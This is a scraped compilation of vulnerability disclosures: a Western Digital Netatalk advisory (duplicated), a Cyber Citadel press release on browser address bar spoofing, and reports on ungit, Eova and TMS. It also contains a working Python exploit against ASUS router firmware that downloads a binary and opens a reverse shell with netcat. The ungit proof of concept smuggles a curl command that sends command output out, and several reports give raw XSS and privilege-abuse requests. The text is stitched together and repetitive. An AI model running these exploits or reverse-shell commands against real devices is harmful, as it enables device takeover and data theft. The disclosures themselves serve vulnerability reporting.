The combination of primitives offered by SMB and AFP in their default configuration allows the arbitrary writing of files. By exploiting these combination of primitives, an attacker can execute arbitrary code.

**WDC Tracking Number:** WDC-22005  
**Published:** March 24, 2022

**Last Updated:** March 24, 2022

**Description**

Netatalk is an open-source Apple File Protocol fileserver that was being used by Western Digital products to access network shares and perform Time Machine backups. Multiple critical vulnerabilities have been discovered in Netatalk. Because Netatalk is unmaintained, we have removed Netatalk from our firmware released on January 10, 2022. Users can continue to access local network shares and perform Time Machine backup via SMB. For additional information, please refer to this KBA.

To take advantage of the latest security fixes, Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.

**Product Impact**

**Minimum Fix Version**

**Last Updated**

My Cloud PR2100

5.19.117

January 10, 2022

My Cloud PR4100

5.19.117

January 10, 2022

My Cloud EX4100

5.19.117

January 10, 2022

My Cloud EX2 Ultra

5.19.117

January 10, 2022

My Cloud Mirror Gen 2

5.19.117

January 10, 2022

My Cloud DL2100

5.19.117

January 10, 2022

My Cloud DL4100

5.19.117

January 10, 2022

My Cloud EX2100

5.19.117

January 10, 2022

My Cloud

5.19.117

January 10, 2022

WD Cloud

5.19.117

January 10, 2022

My Cloud Home

7.16-220

January 10, 2022

**Advisory Summary**

A stack-based buffer overflow vulnerability was discovered within the ad\_addcomment function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-0194

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

An improper handling of exceptional conditions issue was found in the parse\_entries function that did not properly handle parsing AppleDouble entries. This vulnerability could allow a remote attacker to carry out an unauthenticated remote command execution on affected versions of Netatalk.

**CVE Number:** CVE-2022-23121

**Reporteb By:** NCC Group EDG (Alex Plaskett, Cedric Halbronn, Aaron Adams) working with Trend Micro’s Zero Day Initiative

A stack-based buffer overflow vulnerability was discovered within the setfilparams function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-23122

**Reported By:** Orange Tsai (@orange\_8361) from DEVCORE Research Team working with Trend Micro’s Zero Day Initiative

An out-of-bounds read information disclosure vulnerability was discovered in the getdirparams method that could allow an attacker to disclose sensitive information or carry out an unauthenticated remote code execution on the device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer.

**CVE Number:** CVE-2022-23123

**Reported By:** Orange Tsai (@orange\_8361) from DEVCORE Research Team working with Trend Micro’s Zero Day Initiative

An out-of-bounds read information disclosure vulnerability was discovered in the get\_finderinfo method that could allow an attacker to disclose sensitive information or carry out an unauthenticated remote code execution on the device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer.

**CVE Number:** CVE-2022-23124

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

A stack-based buffer overflow vulnerability was discovered within the copyapplfile function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-23125

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

The combination of primitives offered by SMB and AFP in their default configuration allows the arbitrary writing of files. By exploiting these combination of primitives, an attacker can execute arbitrary code.

**CVE Number:** CVE-2022-22995

**Reported By:** Corentin BAYET (@OnlyTheDuck), Etienne HELLUY-LAFONT and Luca MORO (@johncool\_\_) from Synacktiv working with Trend Micro’s Zero Day Initiative

*      
    
    {{ skuObj.title.length < 15 ? skuObj.title : skuObj.title.substring(0,14) + "..." }}

CVE-2022-22995: WDC-22005 Netatalk Security Vulnerabilities | Western Digital

**WDC Tracking Number:** WDC-22005  
**Published:** March 24, 2022

**Last Updated:** March 24, 2022

**Description**

Netatalk is an open-source Apple File Protocol fileserver that was being used by Western Digital products to access network shares and perform Time Machine backups. Multiple critical vulnerabilities have been discovered in Netatalk. Because Netatalk is unmaintained, we have removed Netatalk from our firmware released on January 10, 2022. Users can continue to access local network shares and perform Time Machine backup via SMB. For additional information, please refer to this KBA.

To take advantage of the latest security fixes, Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.

**Product Impact**

**Minimum Fix Version**

**Last Updated**

My Cloud PR2100

5.19.117

January 10, 2022

My Cloud PR4100

5.19.117

January 10, 2022

My Cloud EX4100

5.19.117

January 10, 2022

My Cloud EX2 Ultra

5.19.117

January 10, 2022

My Cloud Mirror Gen 2

5.19.117

January 10, 2022

My Cloud DL2100

5.19.117

January 10, 2022

My Cloud DL4100

5.19.117

January 10, 2022

My Cloud EX2100

5.19.117

January 10, 2022

My Cloud

5.19.117

January 10, 2022

WD Cloud

5.19.117

January 10, 2022

My Cloud Home

7.16-220

January 10, 2022

**Advisory Summary**

A stack-based buffer overflow vulnerability was discovered within the ad\_addcomment function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-0194

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

An improper handling of exceptional conditions issue was found in the parse\_entries function that did not properly handle parsing AppleDouble entries. This vulnerability could allow a remote attacker to carry out an unauthenticated remote command execution on affected versions of Netatalk.

**CVE Number:** CVE-2022-23121

**Reporteb By:** NCC Group EDG (Alex Plaskett, Cedric Halbronn, Aaron Adams) working with Trend Micro’s Zero Day Initiative

A stack-based buffer overflow vulnerability was discovered within the setfilparams function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-23122

**Reported By:** Orange Tsai (@orange\_8361) from DEVCORE Research Team working with Trend Micro’s Zero Day Initiative

An out-of-bounds read information disclosure vulnerability was discovered in the getdirparams method that could allow an attacker to disclose sensitive information or carry out an unauthenticated remote code execution on the device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer.

**CVE Number:** CVE-2022-23123

**Reported By:** Orange Tsai (@orange\_8361) from DEVCORE Research Team working with Trend Micro’s Zero Day Initiative

An out-of-bounds read information disclosure vulnerability was discovered in the get\_finderinfo method that could allow an attacker to disclose sensitive information or carry out an unauthenticated remote code execution on the device. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer.

**CVE Number:** CVE-2022-23124

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

A stack-based buffer overflow vulnerability was discovered within the copyapplfile function that could lead to an unauthenticated remote code execution. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.

**CVE Number:** CVE-2022-23125

**Reported By:** Theori (@theori\_io) working with Trend Micro’s Zero Day Initiative

The combination of primitives offered by SMB and AFP in their default configuration allows the arbitrary writing of files. By exploiting these combination of primitives, an attacker can execute arbitrary code.

**CVE Number:** CVE-2022-22995

**Reported By:** Corentin BAYET (@OnlyTheDuck), Etienne HELLUY-LAFONT and Luca MORO (@johncool\_\_) from Synacktiv working with Trend Micro’s Zero Day Initiative

The DuckDuckGo browser 7.64.4 on iOS allows Address Bar Spoofing due to mishandling of the JavaScript window.open function (used to open a secondary browser window). This could be exploited by tricking users into supplying sensitive information such as credentials, because the address bar would display a legitimate URL, but content would be hosted on the attacker's web site.

Press Releases | 8 February 2022

******New address bar vulnerabilities found in DuckDuckGo and Tap Browser, disclosed by Cyber Citadel researchers, could affect millions of iOS and Android users******

Cyber Citadel’s Lead Security Researcher Rafay Baloch and Security Researcher Muhammad Samak disclosed address bar spoofing vulnerabilities today in the DuckDuckGo browser for iOS, Video Downloader Browser for Android and Tap Browser for iOS mobile web browser applications

These flaws can be exploited, by potentially tricking users into supplying sensitive information to a malicious website. Our discovery found that a malicious attacker could easily lead the unsuspecting users to believe that they are visiting a legitimate website as the address bar points to the correct website. It is pertinent to mention here that, Cyber Citadel, as a part of its responsible disclosure policy gave a time frame of 60 days to all three browsers to fix these vulnerabilities. At the time of publishing this disclosure, the issue was only addressed by DuckDuckGo.

****Address Bar Spoofing Vulnerabili**es**

Mobile web browser address bar spoofing allows an attacker to change the URL of a malicious website to one that represents a legitimate website i.e. google.com, bing.com, facebook.com, or apple.com, for example.

This vulnerability bypasses the security certificates built into most modern mobile address bars. Desktop web browsers designate a website as safe by the lock icon on the far left of an address bar that ‘guarantees’ a website has a valid SSL certificate and is, therefore, secure.

On the other hand, security indicators on mobile devices are harder to find, due to the lack of screen real-estate, and restrict the ability to interrogate security elements. With typical users being unaware of website validation on mobile web browsers, cybercriminals are free to insert fake malicious pages with spoofed URL addresses.

Address bar spoofing traditionally scores approximately 4.3 out of 10 on the Common Vulnerability Scoring System (CVSS), technically assigning address bar spoofing with a moderate impact.

However, given the substantial 667% rise in spear-phishing attacks experienced during the COVID-19 pandemic, mobile address bar spoofing should arguably be held in higher regard. In a survey conducted by Mimecast, 2.1 million domains were tied to phishing attacks, with 47% of successful attacks making use of fraudulent websites. The disclosed DuckDuckGo and Tap Browser vulnerabilities directly tie into these figures by allowing cybercriminals to make fraudulent websites more believable and, therefore, more successful in harvesting sensitive information.

**DuckDuckGo**

‘Hatched’ in 2008, DuckDuckGo has become a popular web browsing tool downloaded 5 million times per month as a mobile application or desktop extension. It gives users the ability to browse the web privately, while protecting users from internet trackers.

The recent address bar spoofing CVE-2021-44683 disclosed by Baloch and Samak considerably weakens DuckDuckGo’s promised privacy protections for iOS users.

In the proof of concept (POC), Baloch and Samak revealed that version 7.64.4 of DuckDuckGo’s iOS application was prone to address bar spoofing due to a mishandling of JavaScript’s window.open function used to open a secondary window.

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/DDG-POC-copy-1.jpg)

DuckDuckGo address bar spoofing POC

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/DDG-Evidence.jpg)

DuckDuckGo address bar spoofing evidence

When exploited by a bad actor, an address bar in a secondary window opened in DuckDuckGo would display a legitimate URL despite being hosted by an attacker. This fraudulent page could be designed to trick users into supplying sensitive PII such as usernames and passwords.

**Tap Browser**

Built exclusively for iOS, Tap Browser is used for its additional web browsing functionalities such as easy navigation icons, in-app media players and an in-built VPN service.

Although a relatively low user base (7,000 downloads), the Tap Browser address bar spoofing vulnerability part of the CVE-2021-44683 disclosed by Baloch and Samak was open to secondary window exploitation.

In the POC, Baloch and Samak demonstrated how a secondary window could be spoofed by a bad actor to replicate Facebook, Gmail, Apple and Bing browsers.

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/Tap-ABS-1.jpg)

1\. POC of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/ABS1.png)

1\. Evidence of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/Tap-ABS-2.jpeg)

2\. POC of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/ABS2.png)

2\. Evidence of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/Tap-ABS-3.jpeg)

3\. POC of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/ABS3.png)

3\. Evidence of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/Tap-ABS-4.jpg)

4\. POC of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/ABS4.png)

4\. Evidence of address bar spoofing in Tap Browser

**Response from Vendors**

**Vendor**

**Service**

**Version**

**Platform**

**Reported Date**

**Fixed**

**CVE**

DuckDuckGo

DuckDuckGo

7.64.4

iOS

26/09/21

7.64.18

CVE-2021-44683

Tap Browser

Tap Browser

1.2

iOS

26/09/21

Unfixed

N/A

**HexCon Talk on Address Bar Spoofing Flaws**

This is not the first time, Rafay Baloch has found flaws in browsers. In October 2021 at the Hexcon Security conference, Rafay Baloch presented his findings across various mobile browsers titled “What you see, is not always what you get”. Various categories of address bar spoofing vulnerabilities were discussed along with how these vulnerabilities can be used to abuse security mechanisms in browsers.

**Previous CVEs Disclosed by Cyber Citadel Researchers**

This disclosure by Cyber Citadel security researchers comes a year after Rafay Baloch teamed up with Rapid7’s Director of Research Tod Beardsley to disclose a similar address bar vulnerability across seven mobile web browsers including Apple Safari and Opera Touch.

Baloch reported multiple vulnerabilities on Chrome and Firefox browsers in 2016, Google Inc’s Android browser in 2014, and was paid a total of US$10,000 for reporting a Code Execution/Command Execution vulnerability on PayPal’s sub-domain in 2012. He is considered one of the world’s top ethical hackers and listed in the Google, Facebook, PayPal and Microsoft Hall of Fame.

CVE-2021-44683: Multiple Address Bar Spoofing Flaws in Mobile Browsers - Cyber Citadel

ASUS AC68U <=3.0.0.4.385.20852 is affected by a buffer overflow in blocking.cgi, which may cause a denial of service (DoS).

AC68U FirmwareVersion < 3.0.0.4.385.20633  
RT-AC5300 FirmwareVersion <3.0.0.4.384.82072  
. . . . . .  
此漏洞影响多个路由器型号，具体型号暂未统计，官方2020年8-9月份修复的RCE漏洞（如下图）似乎就是这个  
![image](https://user-images.githubusercontent.com/45091804/146535975-97051c7f-a65e-465a-8ed6-bc15ae5f6e6c.png)

①系统时间+3600-atol(timestap参数)<20 （timestap参数:通过一次空包返回内容来计算时间戳（注意需要根据设备系统设置时区计算） ![image](https://user-images.githubusercontent.com/45091804/146538461-c4dcb76e-d911-42c3-8c2d-ba7e1309f06f.png)  
②sub\_11840函数为nvram\_get，初始MULTIFILTER\_MAC值为空，str("",mac)，所以mac必须为空  

    #coding=utf-8
    from pwn import *
    import re
    import time
    import requests
    import urlparse
    import urllib3
    urllib3.disable_warnings()
    import sys
    
    def rematch(strTmp):
        tm_year = strTmp[0][2]
        tm_month = strTmp[0][1]
        tm_day = strTmp[0][0]
        tm_hour = strTmp[0][3]
        tm_min = strTmp[0][4]
        tm_sec = strTmp[0][5]
        if tm_month == 'Jan':
            tm_month = '01'
        if tm_month == 'Feb':
            tm_month = '02'
        if tm_month == 'Mar':
            tm_month = '03'
        if tm_month == 'Apr ':
            tm_month = '04'
        if tm_month == 'May':
            tm_month = '05'
        if tm_month == 'Jun':
            tm_month = '06'
        if tm_month == 'Jul':
            tm_month = '07'
        if tm_month == 'Aug':
            tm_month = '08'
        if tm_month == 'Sept':
            tm_month = '09'
        if tm_month == 'Oct':
            tm_month = '10'
        if tm_month == 'Nov':
            tm_month = '11'
        if tm_month == 'Dec':
            tm_month = '12'
        tm_hour = int(tm_hour) + 8  # +8对应时区
        time_tmp = '{}-{}-{} {}:{}:{}'.format(tm_year, tm_month, tm_day, tm_hour, tm_min, tm_sec)
        print(time_tmp)
        ts = time.strptime(time_tmp, "%Y-%m-%d %H:%M:%S")
        timeStamp= int(time.mktime(ts))
        return timeStamp
    
    
    def getTime(url):
        scheme =  urlparse.urlparse(url).scheme
        hostname = urlparse.urlparse(url).hostname
        header={
            'Host': hostname,
            'Cache-Control': 'max-age=0',
            'Upgrade-Insecure-Requests': '1',
            'Origin': scheme+'://'+hostname,
            'Content-Type': 'application/x-www-form-urlencoded',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            'Referer': scheme+'://'+hostname,
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection':'close'
        }
        data1 ={
            'CName': '',
            'mac': '',
            'interval': '',
            'timestap': '',
        }
        url = url+'/blocking_request.cgi'
        ret = requests.post(url = url ,
                      headers = header,
                      data = data1,
                      verify=False)
        format_time =''
        for key, value in (ret.headers).items():
            if 'Date' in key:
                format_time = value
        tmp = re.findall(r', (.*?) (.*?) (.*?) (.*?):(.*?):(.*?) GMT',format_time)
        timeStap = rematch(tmp) + 3600
        timeStapStr = str(timeStap)
        print(timeStapStr)
        data2 ={
            'CName': 'cd /tmp/home/root;wget http://192.168.2.177:8080/busybox-armv6l;chmod 777 *;./busybox-armv6l nc 192.168.2.177:1234 -e /bin/ash',
            'mac': '',
            'interval': 'a'*12+p32(1)+'a'*16+p32(0x0000EFA8),   
            'timestap': timeStapStr +'a'*4740+p32(0x0006FE35),   #p32(addr) 此addr为interval参数内容首地址
    
        }
        ret = requests.post(url = url ,
                      headers = header,
                      data = data2,
                      verify=False,)
        print('End')
    
    
    if __name__ == '__main__':
        url = sys.argv[1]
        getTime(url)

CVE-2021-45757: GitHub - IBUILI/Asus

A Cross-Site Request Forgery (CSRF) in Chamilo LMS 1.11.14 allows attackers to execute arbitrary commands on victim hosts via user interaction with a crafted URL.

CVE-2021-40662: Security issues - Chamilo LMS

Chamilo LMS v1.11.14 was discovered to contain a zero click code injection vulnerability which allows attackers to execute arbitrary code via a crafted plugin. This vulnerability is triggered through user interaction with the attacker's profile page.

CVE-2021-38745: Security issues - Chamilo LMS

The package ungit before 1.5.20 are vulnerable to Remote Code Execution (RCE) via argument injection. The issue occurs when calling the /api/fetch endpoint. User controlled values (remote and ref) are passed to the git fetch command. By injecting some git options it was possible to get arbitrary command execution.

source: snyk.io

**Vulnerability: Remote Code Execution****Affected Version: \*****Technical Details:**

It's possible to get remote code execution via argument injection.

The issue occurs when calling the /api/fetch endpoint. The user input is passed to the git subcommand fetch. Even if a safe API like spawn is used to execute shell commands (

const gitProcess \= child\_process.spawn(gitBin, args.commands, procOpts);

), in this specific case it's still possible to run arbitrary commands via argument injection.

The fetch subcommand accepts a special argument --upload-pack (https://git-scm.com/docs/git-fetch#Documentation/git-fetch.txt---upload-packltupload-packgt). Since the user controls two values provided to the fetch git subcommand (remote and ref), it is possible to execute arbitrary commands by providing the remote value to be --upload-pack="command to execute". The command executed will be similar to the following:

git fetch --upload-pack="command to execute" foobar

Here is the code that accepts these values:

//

'fetch',

req.body.remote,

req.body.ref ? req.body.ref : '',

config.autoPruneOnFetch ? '--prune' : '',

app.post(  
`${exports.pathPrefix}/fetch`,  
ensureAuthenticated,  
ensurePathExists,  
ensureValidSocketId,  
(req, res) => {  
// Allow a little longer timeout on fetch (10min)  
if (res.setTimeout) res.setTimeout(tenMinTimeoutMs);

      const task = gitPromise({
        commands: credentialsOption(req.body.socketId, req.body.remote).concat([
          'fetch',
          req.body.remote,
          req.body.ref ? req.body.ref : '',
          config.autoPruneOnFetch ? '--prune' : '',
        ]),
        repoPath: req.body.path,
        timeout: tenMinTimeoutMs,
      });
    
      jsonResultOrFailProm(res, task).finally(emitGitDirectoryChanged.bind(null, req.body.path));
    }
    

);

**Potential Fix**

A possible remediation to fix this issue could be to add -- (see here for more information about it https://git-scm.com/docs/gitcli/2.25.0#\_description) before the user provided values (it's just a suggestion):

        commands: credentialsOption(req.body.socketId, req.body.remote).concat([
          'fetch',
          config.autoPruneOnFetch ? '--prune' : '',
          '--',
          req.body.remote,
          req.body.ref ? req.body.ref : ''
        ]),
    

**Proof Of Concept/Steps to Reproduce**

Install ungit and setup a project (I used ungit repo itself)  
cd /home/ubuntu/poc/  
npm install -g ungit  
git clone https://github.com/FredrikNoren/ungit.git  
cd ungit/  
ungit  
the project will be available at http://localhost:8448/#/repository?path=/home/ubuntu/poc/ungit  
RCE Exploitation  
setup a listener for accepting incoming connections:  
nc -nvlp 8000

run the following curl command to get the output of the id command:  
curl -d '{"path":"/home/ubuntu/poc/ungit","remote":"--upload-pack=curl http://localhost:8000/ --data "$(id)"","ref":"foobar","socketId":1}' -H "Content-Type: application/json" -X POST http://localhost:8448/api/fetch

This is the same request sent:

    POST /api/fetch HTTP/1.1
    Host: localhost:8448
    Content-Length: 134
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    Accept: application/json
    Content-Type: application/json
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    sec-ch-ua-platform: "Linux"
    Origin: http://localhost:8448/
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: [http://localhost:8448/
    Accept-Encoding](http://localhost:8448/%0DAccept-Encoding): gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"path":"/home/ubuntu/poc/ungit","remote":"--upload-pack=curl http://localhost:8000/ --data \"$(id)\"",
    "ref":"foobar",
    "socketId":1}

CVE-2022-25766: Fix potential remote code exec by jung-kim · Pull Request #1510 · FredrikNoren/ungit

A stored cross-site scripting (XSS) vulnerability in the Add a Button function of Eova v1.6.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the button name text box.

\[Suggested description\]  
Cross SIte Scripting (XSS) vulnerability exists in eova. Because the form submission did not effectively process the special characters entered by the user, the malicious JS code was executed.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://gitee.com/eova/eova

\[Affected Product Code Base\]  
v1.6.0

\[Affected Component\]  
POST /button/doQuick HTTP/1.1  
Host: localhost:8700  
Content-Length: 147  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost:8700  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:8700/button/quick/biz\_demo\_tree\_code  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: locale=zh-cn; Hm\_lvt\_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=D8FBC740992D82D7A03C51EC3BBFEF12  
Connection: close

menu\_code=biz\_demo\_tree\_code&icon=eova-icon0&name=12%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&ui=%2FTologin&uri=&bs=%2FtoLogin&group\_num=0&role=1

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true

\[Vulnerability proof\]  
Quickly add a button, and enter the malicious JS code in the button name information box.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0301/145525_cf52be30_9017458.png "屏幕截图.png")

Enter the system management - role management page, select a role for authorization, open the icon display list, and trigger the XSS pop-up window.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0301/145549_08daa68b_9017458.png "屏幕截图.png")

CVE-2022-26555: There is a stored xss vulnerability exists in eova · Issue #I4VRE9 · EOVA/eova - Gitee.com

TMS v2.28.0 contains an insecure permissions vulnerability via the component /TMS/admin/user/Update2. This vulnerability allows attackers to modify the administrator account and password.

\[Suggested description\]  
There is an ultra vires vulnerability in the function of modifying personal information in TMS.The vulnerability originates from / TMS / admin / user / Update2. The administrator account and password can be modified beyond his authority by modifying the packet parameters.

\[Vulnerability Type\]  
Insecure Permissions

\[Vendor of Product\]  
https://github.com/xiweicheng/tms

\[Affected Product Code Base\]  
v2.28.0

\[Affected Component\]  
POST /tms/admin/user/update2 HTTP/1.1  
Host: localhost:8080  
Content-Length: 66  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost:8080/  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:8080/tms/admin/user  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: JSESSIONID=B45BEAFD82AAE86E3D98FE866FA0851E; Hm\_lvt\_a4980171086658b20eb2d9b523ae1b7b=1645604517; Hm\_lpvt\_a4980171086658b20eb2d9b523ae1b7b=1645604534  
Connection: close

username=admin&password=88888888&name=admin&mail=admin%40google.com&=

\[Attack Type\]  
Remote

\[Vulnerability proof\]

1.Access with test account http://localhost:8080/tms/admin  
![image](https://user-images.githubusercontent.com/85676107/155444006-6a467eb6-814c-4f59-8df6-3bbc3d1339ca.png)

2.In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password: 88888888.  
![image](https://user-images.githubusercontent.com/85676107/155444066-c4bc8f95-8d4a-44e8-bfca-f282863d6355.png)  
Now I log in to the test account to try to change the information and password of the admin account.

3.Click the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window.  
![image](https://user-images.githubusercontent.com/85676107/155444117-40e555fb-647e-4b40-be6d-13c83f31e4cc.png)  
![image](https://user-images.githubusercontent.com/85676107/155444148-ccf99e0a-91ff-4a61-a732-ed612c35aa56.png)

4.Because there is no need to verify the user's original password, you can set the new password directly. Here, the password is set as change123 in the form submission, and other information will not be changed. Open the burpsuite packet capturing agent - > click the confirm submit button.  
![image](https://user-images.githubusercontent.com/85676107/155444175-0f9890ac-cefc-4960-a4ba-ee09ffba5c06.png)

5.Modify the packet capture data, as shown in the following figure.  
![image](https://user-images.githubusercontent.com/85676107/155444200-a9d0f185-6c03-4642-a7de-5fbf276c9550.png)

6.Click forwad to finish the modification.  
![image](https://user-images.githubusercontent.com/85676107/155444218-0aa54095-ca59-4bac-bf75-e6e295052fc3.png)

The information of viewing admin has changed.Vulnerability recurrence completed.  
![image](https://user-images.githubusercontent.com/85676107/155444254-8f0dbdd3-6361-4c2c-99d8-01c0d04e71bb.png)

CVE-2022-26247: There is a Insecure Permissions vulnerability exists in tms · Issue #16 · xiweicheng/tms

TMS v2.28.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /TMS/admin/setting/mail/createorupdate.

\[Suggested description\]  
Cross SIte Scripting (XSS) vulnerability exists in tms. The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://github.com/xiweicheng/tms

\[Affected Product Code Base\]  
v2.28.0

\[Affected Component\]  
POST /tms/admin/setting/mail/createOrUpdate HTTP/1.1  
Host: localhost:8080  
Content-Length: 113  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost:8080  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:8080/tms/admin/setting  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: JSESSIONID=CDC518A82EFF7D857356EBF9AB4206D2; locale=zh-cn; Hm\_lvt\_a4980171086658b20eb2d9b523ae1b7b=1645520663; Hm\_lpvt\_a4980171086658b20eb2d9b523ae1b7b=1645601594  
Connection: close

host=smtp.163.com&port=25%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&username=someone%40163.com&password=&addr=&=

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true

\[Vulnerability proof\]  
1.Access URL: http://localhost:8080/tms/admin/setting , enter the system setting interface  
![image](https://user-images.githubusercontent.com/85676107/155281262-0816a893-788d-47ab-9f94-9ae081709811.png)

2.Enter JS code in the form: <script> alert ("XSS") </script >  
![image](https://user-images.githubusercontent.com/85676107/155281298-8bd131b0-159d-40cd-ab2e-d5c8e8c8fcc8.png)

![image](https://user-images.githubusercontent.com/85676107/155281339-7f848526-78a9-4822-8ec3-e3b53f129a93.png)

3.Click Save to trigger a pop-up window, and the loophole reappearance is completed.  
![image](https://user-images.githubusercontent.com/85676107/155281371-35b2ff32-4ced-40ea-8a53-dd645a66d20c.png)

4.The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.  
![image](https://user-images.githubusercontent.com/85676107/155281406-8f48ff01-165a-48a0-a911-88518b0bbac1.png)

![image](https://user-images.githubusercontent.com/85676107/155281776-fbc93145-9579-4949-87f3-a5aab75c91e9.png)

Tag

#apple